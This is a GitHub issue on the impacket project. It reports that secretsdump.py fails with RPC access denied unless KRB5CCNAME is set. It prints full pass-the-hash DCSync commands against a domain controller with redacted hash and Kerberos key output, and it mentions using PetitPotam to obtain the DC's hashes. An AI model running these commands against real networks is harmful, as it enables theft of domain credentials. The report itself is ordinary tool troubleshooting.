
RPC Access Denied - Except when KRB5CCNAME is set with anything #1674

Open
raithedavion opened this issue Jan 3, 2024 · 1 comment
Labels: in review (This issue or pull request is being analyzed)

Comments

raithedavion (Contributor) commented Jan 3, 2024

Configuration

impacket version: v0.11.0
Python version: 3.11.4
Target OS: Kali

This does not work...

$ secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Exiting NTDSHashes.dump() because rpc_s_access_denied
[*] Cleaning up... 

This does?

$ KRB5CCNAME=wtf.txt secretsdump.py -debug -ntds NTDS 'example.com/dc02$'@dc01.example.com -dc-ip 10.0.0.100 -hashes :<redacted> -outputfile ntdsdump -just-dc-user adminuser1
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /home/raithedavion/.local/pipx/venvs/impacket/lib/python3.11/site-packages/impacket
[+] Saving output to ntdsdump
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for adminuser1 
[+] Calling DRSGetNCChanges for {50a0e1bd-9021-436c-accb-ffeaa0276702} 
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=adminuser1,OU=Admin Users,DC=example,DC=com
example.com\adminuser1:22773:aad3b435b51404eeaad3b435b51404ee:<redacted>:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
example.com\adminuser1:aes256-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:aes128-cts-hmac-sha1-96:<redacted>
example.com\adminuser1:des-cbc-md5:<redacted>
[*] Cleaning up... 

Additional context

Used PetitPotam to get the DC's NTLM hashes, then went and tried to dump the domain. Trying to dump the domain on this client failed, so I tried -just-dc-user (rpc_access_denied). Tried just about everything including ticketer, and finally set KRB5CCNAME and all of a sudden it just works using -just-dc-user.

Repeated the steps: I've set KRB5CCNAME to blank (export KRB5CCNAME=) and set it to non-existent files and blank files (wtf.txt above). For some reason, only when KRB5CCNAME is set will it dump this domain. I don't know the domain's exact setup so that could have something to do with it, but I find it odd that KRB5CCNAME being set is the fix when using the NTLM hash.

gabrielg5 added the "in review" label Jan 4, 2024

Zamanry commented Apr 29, 2024

I've encountered this issue. EDR on the DC is not triggering nor is any other prevention. No crazy RPC hardening has occurred either. I was unable to even get the -just-dc-user flag to work with a specific user.

4 participants